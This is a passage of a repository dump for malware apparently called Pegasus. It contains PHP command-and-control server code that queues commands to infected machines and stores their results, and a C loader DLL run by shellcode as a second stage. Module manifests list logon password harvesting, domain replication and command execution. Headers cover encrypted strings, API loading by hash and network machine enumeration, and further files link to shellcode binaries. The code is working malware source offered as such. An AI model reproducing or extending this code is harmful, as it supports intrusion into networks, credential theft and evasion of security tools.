18:47:46 21 | 22 | 23 | 04/22/2015 06:57:00 24 | 25 | 26 | 04/22/2015 05:35:01 27 | 28 | 29 | 08/04/2015 10:59:31 30 | 31 | 32 | 07/19/2015 10:35:32 33 | 34 | 35 | 06/07/2015 19:53:25 36 | 37 | 38 | 07/18/2015 20:16:09 39 | 40 | 41 | 05/29/2015 18:58:41 42 | 43 | 44 | 07/18/2015 20:16:09 45 | 46 | 47 | 08/10/2015 21:24:12 48 | 49 | 50 | 08/05/2015 11:21:32 51 | 52 | 53 | 05/29/2015 18:26:58 54 | 55 | 56 | -------------------------------------------------------------------------------- /Pegasus/WEB/cfg/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/cfg/config.php: -------------------------------------------------------------------------------- 1 | 'localhost', 8 | 'db' => 'pegasus', 9 | 'user' => 'root', 10 | 'password' => '12345' 11 | ); 12 | 13 | // TARGET_BUILDCHAIN_HASH 14 | $g_k = '7393c9a643eb4a76'; 15 | 16 | 17 | 18 | 19 | ?> -------------------------------------------------------------------------------- /Pegasus/WEB/inc/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_crypt.php: -------------------------------------------------------------------------------- 1 | unsigned 18 | $k['m_w'] = (float)sprintf('%u', $k['m_w']); 19 | $k['m_z'] = (float)sprintf('%u', $k['m_z']); 20 | 21 | //echo "k={$g_k} w=".bin2hex(pack('V', $k['m_w']))." ({$k['m_w']}) z=".bin2hex(pack('V', $k['m_z']))." ({$k['m_z']})\n"; 22 | 23 | while ($len) { 24 | 25 | //echo "i={$len} a=".strval(($k['m_w'] & 65535))." b=".strval(36969 * ($k['m_w'] & 65535))." c=".strval((($k['m_w'] >> 16) & $mask))." "; 26 | 27 | $k['m_z'] = 36969 * ($k['m_z'] & 65535) + (($k['m_z'] >> 16) & $mask); 28 | $k['m_w'] = 18000 * ($k['m_w'] & 65535) + (($k['m_w'] >> 16) & $mask); 29 | 30 | $val = (($k['m_z'] << 16) + $k['m_w']) & 0xFF; 31 | 32 | $pwd .= chr($val); 33 | //echo "i={$len} v={$val} w=".bin2hex(pack('V', $k['m_w']))." ({$k['m_w']}) z=".bin2hex(pack('V', $k['m_z']))." ({$k['m_z']})\n"; 34 | 35 | $len--; 36 | } 37 | 38 | 39 | return sha1($pwd, TRUE); 40 | } 41 | 42 | 43 | 44 | function cryptDecrypt($data) 45 | { 46 | return @openssl_decrypt($data, 'des', cryptGenPwd(), 1); 47 | } 48 | 49 | 50 | 51 | function cryptEncrypt($data) 52 | { 53 | return @openssl_encrypt($data, 'des', cryptGenPwd(), 1); 54 | } 55 | 56 | ?> -------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_db.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_log.php: -------------------------------------------------------------------------------- 1 | $value) 16 | { 17 | if (substr($name, 0, 5) == 'HTTP_') 18 | { 19 | $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; 20 | } 21 | } 22 | return $headers; 23 | } 24 | } 25 | 26 | /* 27 | Saves unparsed query information to db 28 | */ 29 | function logSaveQuery($parse_error) 30 | { 31 | global $g_dblink; 32 | 33 | $log = array_merge( 34 | array( 35 | 'ERR' => $parse_error, 36 | 'Method' => $_SERVER['REQUEST_METHOD'], 37 | 'Uri' => $_SERVER['REQUEST_URI'], 38 | 'Remote-Address' => $_SERVER['REMOTE_ADDR'] 39 | ), 40 | getallheaders() 41 | ); 42 | 43 | $enc_log = mysqli_real_escape_string($g_dblink, json_encode($log)); 44 | 45 | mysqli_query($g_dblink, "INSERT INTO `q_log` (`stamp`, `log_json`) VALUES (NOW(), '{$enc_log}')"); 46 | 47 | } 48 | 49 | ?> -------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_output.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0002.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0003.php: -------------------------------------------------------------------------------- 1 | strlen($mod_data)) { $error = __FUNCTION__."(".__LINE__."): basic len check failed, found {$item['dwPayloadSize']}, max expected ".strval(strlen($mod_data)); return FALSE; } 26 | if (strlen($payload) != $item['dwPayloadSize']) { $error = __FUNCTION__."(".__LINE__."): payload len mismatch, expected {$item['dwPayloadSize']}, found ".strval(strlen($payload)); return FALSE; } 27 | 28 | $payload = mysqli_real_escape_string($g_dblink, $payload); 29 | 30 | if (!mysqli_query($g_dblink, "UPDATE `cmds_list` SET `is_done`={$item['wGenericResult']}, `answer`='{$payload}' WHERE `id`={$item['dwUniqCmdId']} LIMIT 1;")) { $error = __FUNCTION__."(".__LINE__."): query failed: ".mysqli_error($g_dblink); return FALSE; } 31 | 32 | // all ok if got here 33 | return TRUE; 34 | } 35 | 36 | ?> -------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0004.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0005.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0007.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/pegasus-web.phpproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | Debug 5 | pegasus-web 6 | f4cba7e9-6d7b-4d03-bb44-5d201148dd94 7 | Library 8 | PHPWebProject1 9 | {A0786B88-2ADB-4C21-ABE8-AA2D79766269} 10 | PHPWebProject1 11 | 12 | False 13 | Custom 14 | BeforeRun 15 | True 16 | 46112 17 | denwer 18 | http://localhost:46112/ 19 | http://denwer/pegasus/ 20 | denwer 21 | 22 | 23 | true 24 | 25 | 26 | false 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Pegasus/WEB/pegasus-web.phpproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | denwer 5 | DontOpenPage 6 | 7 | 8 | True 9 | False 10 | False 11 | 12 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.c: -------------------------------------------------------------------------------- 1 | /* 2 | wdd.c 3 | Work Dispatcher DLL 4 | Executed by some binary or shellcode on second run stage. Establishes core module functionality, 5 | loads all other modules specified at DllEntry param 6 | 7 | */ 8 | 9 | 10 | // perform essential compiler settings 11 | // remove stdlib 12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 16 | 17 | #if defined(_M_X64) 18 | // x64 system libs 19 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 20 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 21 | #define TARGET_ARCH ARCH_TYPE_X64 22 | #elif defined(_M_IX86) 23 | // x32 system libs 24 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 25 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 26 | #define TARGET_ARCH ARCH_TYPE_X32 27 | #else 28 | #error Unknown target CPU, no system libs can be found 29 | #endif 30 | 31 | #include 32 | 33 | #include "..\inc\mem.h" 34 | #include "..\inc\dbg.h" 35 | //#include "..\inc\CryptoStrings.h" 36 | 37 | #include "..\inc\WorkDispatcher.h" 38 | 39 | #include "..\shared\config.h" 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | #include "wdd.h" 49 | 50 | 51 | 52 | // entrypoint function for service exe 53 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 54 | { 55 | BOOL bRes = TRUE; 56 | 57 | if (fdwReason == DLL_PROCESS_ATTACH) { 58 | 59 | DbgPrint("DLL_PROCESS_ATTACH: entered"); 60 | 61 | // do init and return right back 62 | WorkDispatcherInit((SHELLCODE_CONTEXT *)lpvReserved); 63 | 64 | //#ifdef _DEBUG 65 | // memPrintAllocationListDialog(0x1); 66 | //#endif 67 | 68 | DbgPrint("DLL_PROCESS_ATTACH: done"); 69 | 70 | } // DLL_PROCESS_ATTACH 71 | 72 | return bRes; 73 | } 74 | 75 | 76 | 77 | 78 | 79 | #ifdef _DEBUG 80 | 81 | // entrypoint to be caller from regsvr32 for debugging 82 | 83 | __declspec(dllexport) HRESULT __stdcall DllRegisterServer(void) 84 | { 85 | DbgPrint("entered dbg mode"); 86 | 87 | // DllEntry(NULL, DLL_PROCESS_ATTACH, NULL); 88 | 89 | DbgPrint("finished"); 90 | 91 | Sleep(INFINITE); 92 | 93 | return S_OK; 94 | } 95 | 96 | #endif 97 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.h: -------------------------------------------------------------------------------- 1 | /* 2 | wdd.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | regsvr32.exe 5 | $(TargetPath) 6 | WindowsLocalDebugger 7 | 8 | 9 | regsvr32.exe 10 | $(TargetPath) 11 | WindowsLocalDebugger 12 | 13 | -------------------------------------------------------------------------------- /Pegasus/binres/idd.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/idd.x32 -------------------------------------------------------------------------------- /Pegasus/binres/idd.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/idd.x64 -------------------------------------------------------------------------------- /Pegasus/binres/info.json/idd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_IDD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_CmdExec: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_TASKWORKS", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_DomainReplication: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_REPLICATOR", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_KBRI: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_OTHER", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_KBRI_hd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_KBRI_HD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_LogonPasswords: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_AUTHCREDS_HARVESTER", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_NetworkConnectivity: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_NETWORK", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/rse: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_RSE", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1, 6 | "DoSign" : 1, 7 | "AVCheckSave": 1 8 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/shellcode: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_SHELLCODE", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : "%shellcode_ep_offset%" 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/wdd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_WDD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/mod_CmdExec.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_CmdExec.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_CmdExec.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_CmdExec.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_DomainReplication.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_DomainReplication.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_DomainReplication.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_DomainReplication.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_LogonPasswords.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_LogonPasswords.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_LogonPasswords.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_LogonPasswords.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_NetworkConnectivity.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_NetworkConnectivity.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_NetworkConnectivity.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_NetworkConnectivity.x64 -------------------------------------------------------------------------------- /Pegasus/binres/readme.txt: -------------------------------------------------------------------------------- 1 | This directory contains files to be incorporated into resulting binres pack. 2 | Post-build script for installer routine searches for *.x32/*.x64 pairs here 3 | For every found file, it searches for a corresponding .info.json file with params about a specified module 4 | to be put into resulting structure. 5 | Output is put into binpack.bin here and translated into ..\inc\binpack.h -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32 -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32.nosign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32.nosign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32.sign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32.sign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64 -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64.nosign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64.nosign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64.sign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64.sign.sav -------------------------------------------------------------------------------- /Pegasus/binres/shellcode.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/shellcode.x32 -------------------------------------------------------------------------------- /Pegasus/binres/shellcode.x64.tlog: -------------------------------------------------------------------------------- 1 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4244)[mod_DomainReplication x64]: DllEntry@92: DLL_PROCESS_ATTACH: entered 2 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4244)[mod_DomainReplication x64]: DllEntry@100: DLL_PROCESS_ATTACH: done 3 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4936)[mod_DomainReplication x64]: thrModuleRun@72: entered 4 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4936)[mod_DomainReplication x64]: infStartDomainReplication@740: entered 5 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EC4h:4552/4936)[mod_DomainReplication x64]: infStartDomainReplication@745: v2 now 6 | -------------------------------------------------------------------------------- /Pegasus/binres/wdd.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/wdd.x32 -------------------------------------------------------------------------------- /Pegasus/binres/wdd.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/wdd.x64 -------------------------------------------------------------------------------- /Pegasus/inc/CryptRoutines.h: -------------------------------------------------------------------------------- 1 | /* 2 | CryptRoutines.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | #include "MyStreams.h" 9 | 10 | // internal global structure holding crypt keys 11 | typedef struct _CRYPT_CONTEXT { 12 | 13 | BOOL bInited; // flag indicating if init was performed 14 | 15 | HCRYPTPROV hProvider; // crypto api provider used in routines 16 | HCRYPTKEY hKey; // key handle used in encryption/decryption routines 17 | 18 | } CRYPT_CONTEXT, *PCRYPT_CONTEXT; 19 | 20 | BOOL cryptCalcHashSHA(PVOID pData, SIZE_T ulSize, PBYTE pbResultBuffer, PULONG pulBufferLen); 21 | BOOL cryptEncryptStream(MY_STREAM *mStream); 22 | BOOL cryptDecryptBuffer(LPVOID pCrypted, DWORD dwCryptedLen, LPVOID *pDecrypted, DWORD *dwDecryptedLen); -------------------------------------------------------------------------------- /Pegasus/inc/CryptoStrings.h: -------------------------------------------------------------------------------- 1 | /* 2 | CryptoStrings.h 3 | Headers for cryptostrings 4 | 5 | Main idea is CRSTR(original_string, crypted_varname) macro like 6 | 7 | szBuff = CRSTR("/script.html", "\xff\xff\x0f\x0c\xf3\xff\x40\x17\xec\xf5\xe6\xf4\x1b\x49\xc7\xd0\x22\x2b\x3b"); 8 | 9 | In case of no CRSTR_ENABLE defined, it will expand to an ANSI string in a manner 10 | szBuff = "/script.html"; 11 | 12 | In case of crypto strings enabled, it will be expanded to string decryption routine's call like 13 | szBuff = __CRSTRDecrypt("\x02\x05\x33\x10\x90\x90\x90\x90\x66\x66\x66\x66\x66\x66"); 14 | passed crypted binary string is generated by parser. 15 | 16 | It is possible to define a string encryption solely inside of C++11 compilation using variadic templates. 17 | But they are too ugly. 18 | 19 | */ 20 | #pragma once 21 | 22 | #include 23 | 24 | // dbg to totally remove string encryption 25 | //#define CRSTR_DISABLE 26 | 27 | 28 | 29 | 30 | 31 | 32 | // select how to implement crypt macro 33 | #ifdef CRSTR_DISABLE 34 | // no encryption 35 | #define CRSTR(original_str, crypted_str) original_str 36 | 37 | #else 38 | // use encryption 39 | #define CRSTR(original_str, crypted_str) __CRSTRDecrypt((BYTE *)crypted_str) 40 | #define CRSTRA(original_str, crypted_str) CRSTR(original_str, crypted_str) 41 | #define CRSTRW(original_str, crypted_str) __cs_AtoW(__CRSTRDecrypt((BYTE *)crypted_str)) 42 | 43 | // NB: n_minlen, n_maxlen is [1,255] range, 44 | // s_generation_regexp is regexp like "[a-zA-Z0-9._]" to be matched against chr(rand(0,255)) 45 | #define CRSTRW_RND(rnd_decrypted_str, rnd_encrypted_str, n_minlen, n_maxlen, s_generation_regexp) __cs_AtoW(__CRSTRDecrypt((BYTE *)rnd_encrypted_str)) 46 | 47 | // define functions for import-export, used in both compilation modes 48 | typedef struct _CryptoStrings_ptrs { 49 | 50 | LPSTR (*fn__CRSTRDecrypt)(const BYTE *pIn); // decryption routine 51 | LPWSTR(*fn__cs_AtoW)(LPSTR szAnsiString); // ansi to unicode convertor 52 | 53 | } CryptoStrings_ptrs, *PCryptoStrings_ptrs; 54 | 55 | 56 | #ifdef ROUTINES_BY_PTR 57 | 58 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 59 | 60 | // global var definition to be visible by all modules which use this one 61 | #ifdef __cplusplus 62 | extern "C" CryptoStrings_ptrs CryptoStrings_apis; 63 | #else 64 | extern CryptoStrings_ptrs CryptoStrings_apis; 65 | #endif 66 | 67 | // transparent code replacements 68 | #define __CRSTRDecrypt CryptoStrings_apis.fn__CRSTRDecrypt 69 | #define __cs_AtoW CryptoStrings_apis.fn__cs_AtoW 70 | 71 | 72 | VOID CryptoStrings_resolve(CryptoStrings_ptrs *apis); 73 | 74 | #else 75 | 76 | 77 | #ifdef __cplusplus 78 | extern "C" { 79 | #endif 80 | LPSTR __CRSTRDecrypt(const BYTE *pIn); // decryption routine 81 | LPWSTR __cs_AtoW(LPSTR szAnsiString); // ansi to unicode convertor 82 | 83 | VOID CryptoStrings_imports(CryptoStrings_ptrs *apis); 84 | #ifdef __cplusplus 85 | } 86 | #endif 87 | 88 | #endif 89 | 90 | #endif 91 | 92 | -------------------------------------------------------------------------------- /Pegasus/inc/DomainListMachines.h: -------------------------------------------------------------------------------- 1 | /* 2 | DomainListMachines.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include 8 | 9 | // callback function for enuming network items 10 | typedef BOOL(CALLBACK* WNETENUMITEMSFUNC)(LPNETRESOURCE, LPWSTR, LPVOID); 11 | 12 | // define functions for import-export, used in both compilation modes 13 | typedef struct _DomainListMachines_ptrs { 14 | 15 | BOOL (*fndlmEnumV1)(LPWSTR wszDomain); 16 | BOOL (*fndlmEnumV2)(BOOL bEnumShares, BOOL bEnumAllNetworks, WNETENUMITEMSFUNC efnEnumFunc, LPVOID pCallbackParam); 17 | 18 | } DomainListMachines_ptrs, *PDomainListMachines_ptrs; 19 | 20 | 21 | 22 | 23 | #ifdef ROUTINES_BY_PTR 24 | 25 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 26 | 27 | // global var definition to be visible by all modules which use this one 28 | extern DomainListMachines_ptrs DomainListMachines_apis; 29 | 30 | // transparent code replacements 31 | #define dlmEnumV1 DomainListMachines_apis.fndlmEnumV1 32 | #define dlmEnumV2 DomainListMachines_apis.fndlmEnumV2 33 | 34 | VOID DomainListMachines_resolve(DomainListMachines_ptrs *apis); 35 | 36 | #else 37 | 38 | BOOL dlmEnumV1(LPWSTR wszDomain); 39 | BOOL dlmEnumV2(BOOL bEnumShares, BOOL bEnumAllNetworks, WNETENUMITEMSFUNC efnEnumFunc, LPVOID pCallbackParam); 40 | 41 | VOID DomainListMachines_imports(DomainListMachines_ptrs *apis); 42 | 43 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/DynImports.h: -------------------------------------------------------------------------------- 1 | /* 2 | DynImports.h 3 | Headers file 4 | */ 5 | 6 | 7 | #include 8 | 9 | #include 10 | 11 | // Redefine PEB structures. The structure definitions in winternl.h are incomplete. 12 | // copy from shellcode version 13 | 14 | typedef struct _MY_PEB { 15 | BYTE InheritedAddressSpace; 16 | BYTE ReadImageFileExecOptions; 17 | BYTE BeingDebugged; 18 | BYTE Spare; 19 | LPVOID Mutant; 20 | LPVOID ImageBaseAddress; 21 | LPVOID LoaderData; 22 | LPVOID ProcessParameters; 23 | LPVOID SubSystemData; 24 | LPVOID ProcessHeap; 25 | LPVOID FastPebLock; 26 | LPVOID FastPebLockRoutine; 27 | LPVOID FastPebUnlockRoutine; 28 | LPVOID EnvironmentUpdateCount; 29 | LPVOID KernelCallbackTable; 30 | LPVOID SystemReserved; 31 | LPVOID AtlThunkSListPtr32; 32 | } MY_PEB, *PMY_PEB; 33 | 34 | 35 | typedef struct _MY_PEB_LDR_DATA { 36 | ULONG Length; 37 | BOOL Initialized; 38 | PVOID SsHandle; 39 | LIST_ENTRY InLoadOrderModuleList; 40 | LIST_ENTRY InMemoryOrderModuleList; 41 | LIST_ENTRY InInitializationOrderModuleList; 42 | } MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA; 43 | 44 | typedef struct _MY_LDR_DATA_TABLE_ENTRY 45 | { 46 | LIST_ENTRY InLoadOrderLinks; 47 | LIST_ENTRY InMemoryOrderLinks; 48 | LIST_ENTRY InInitializationOrderLinks; 49 | PVOID DllBase; 50 | PVOID EntryPoint; 51 | ULONG SizeOfImage; 52 | UNICODE_STRING FullDllName; 53 | UNICODE_STRING BaseDllName; 54 | } MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY; 55 | 56 | 57 | // global internal struct 58 | typedef struct _diLibsState 59 | { 60 | WORD wStructSize; // size of structure 61 | 62 | // dlls directory path 63 | LPWSTR wszSystemDllPath; // like 'c:\windows\system32\' 64 | LPWSTR wszSystemDllSeekMask; // like 'c:\windows\system32\*.*' 65 | 66 | // guard cs 67 | CRITICAL_SECTION csGuard; 68 | 69 | // already found records (libraries, apis) 70 | // in a form of linked list 71 | // ... 72 | 73 | } diLibsState, *PdiLibsState; 74 | 75 | 76 | // definition of enum func for diEnumExports() 77 | typedef BOOL (__stdcall *PDI_ENUM_EXPORTS_CALLBACK)( LPSTR szExportName, LPVOID pFuncAddr, LPVOID pParameter ); // should return FALSE to stop enum 78 | typedef PDI_ENUM_EXPORTS_CALLBACK LPDI_ENUM_EXPORTS_CALLBACK; 79 | 80 | 81 | // declarations 82 | #ifdef __cplusplus 83 | extern "C" { 84 | #endif 85 | HMODULE LoadLibraryByHash(UINT64 i64Hash, BOOL bMemLoadDependencies, BOOL bCallDllMain); 86 | BOOL LoadAPIs(HMODULE hLib, PUINT64 pi64HashesArray, UINT iElementsCount, LPVOID pStorePtrsArray); 87 | UINT64 diHashName(LPWSTR wszNameToHashIn); 88 | BOOL diLoadAPI(HMODULE hLib, UINT64 i64Hash, LPVOID *pStorePlace); 89 | LPWSTR diGetSystemDllsPath(); 90 | BOOL diEnumExports(HMODULE hLib, PDI_ENUM_EXPORTS_CALLBACK pEnumFunc, LPVOID pParameter); 91 | HMODULE GetModuleHandleByHash(UINT64 i64Hash); 92 | #ifdef __cplusplus 93 | } 94 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/HashDeriveFuncs.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | HashDeriveFuncs.cpp 3 | Routines to generate target hash from some source 4 | Used to init rnd pseudo-random number generators from constant source 5 | */ 6 | 7 | #include 8 | 9 | #include "dbg.h" 10 | #include "mem.h" 11 | #include "HashedStrings.h" 12 | #include "CryptoStrings.h" 13 | 14 | #include "HashDeriveFuncs.h" 15 | 16 | LPWSTR g_wszLocalMachineName = NULL; 17 | 18 | /* 19 | Calculates a CONSTANT hash from target machine name (without ^ HASHSTR_RND_XOR) 20 | wszTargetMachineName may be NULL to indicate local machine (a name will be queried internally and stored) 21 | or some other machine in format '\\WS-NAME'. Also supported '\\*' format if needed by caller 22 | */ 23 | UINT64 i64CalcTargetMachineHash(LPWSTR wszTargetMachineName) 24 | { 25 | DWORD dwLen; // tmp len var 26 | LPWSTR wszResBuff, wszS; 27 | UINT64 i64Res = 0; // func result 28 | 29 | do { // not a loop 30 | 31 | // directly hash if used passed param 32 | if (wszTargetMachineName) { i64Res = HashStringW_const(wszTargetMachineName); break; } 33 | 34 | // need to query local machine's name 35 | if (!g_wszLocalMachineName) { 36 | 37 | g_wszLocalMachineName = (LPWSTR)my_alloc(1024); 38 | dwLen = MAX_COMPUTERNAME_LENGTH + 1; 39 | GetComputerName(g_wszLocalMachineName, &dwLen); 40 | 41 | } // !g_wszLocalMachineName 42 | 43 | // form resulting buffer 44 | wszResBuff = (LPWSTR)my_alloc(1024); 45 | wszS = 